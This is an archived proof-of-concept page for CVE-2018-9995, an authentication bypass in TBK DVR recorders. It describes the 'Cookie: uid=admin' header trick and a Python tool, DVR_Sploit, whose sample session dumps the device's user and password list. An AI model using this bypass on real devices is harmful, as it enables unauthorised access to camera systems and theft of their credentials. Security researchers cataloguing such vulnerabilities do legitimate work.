CVE-2018-9995 PoC — TBK DVR4104和DVR4216 安全漏洞

Source

Associated Vulnerability

Title:TBK DVR4104和DVR4216 安全漏洞 (CVE-2018-9995)
Description:TBK DVR4104和DVR4216都是高清数字录像机设备。 TBK DVR4104和DVR4216中存在安全漏洞。远程攻击者可借助Cookie: uid=admin包头利用该漏洞绕过身份验证。

Description

Simple python3 script to automate CVE-2018-9995

Readme

# DVR_Sploit
Simple python3 script to automate CVE-2018-9995

![dvrsploit](https://github.com/X3RX3SSec/DVR_Sploit/assets/141476851/7668e9ee-2881-4619-8903-4350a88334c0)

Requirements: requests (pip install requests)

Usage:
root@fuckmachine:~# python3 dvrsploit.py

Enter DVR host: 192.168.69.69

Enter DVR port: 88

Device list:

{"result":0,"list":[{"uid":"admin","pwd":"","role":2,"enmac":0,"mac":"00:00:00:00:00:00","playback":4294967295,"view":4294967295,"rview":4294967295,"ptz":4294967295,"backup":4294967295,"opt":4294967295}]}
Device list appended to dvr_output.txt

File Snapshot


 [4.0K]  /data/pocs/29e6b63bdff5b2842c9243e2e602bde312f184d1
├── [ 45K]  dvrsploit.jpg
├── [1.4K]  dvrsploit.py
├── [ 34K]  LICENSE
└── [ 576]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!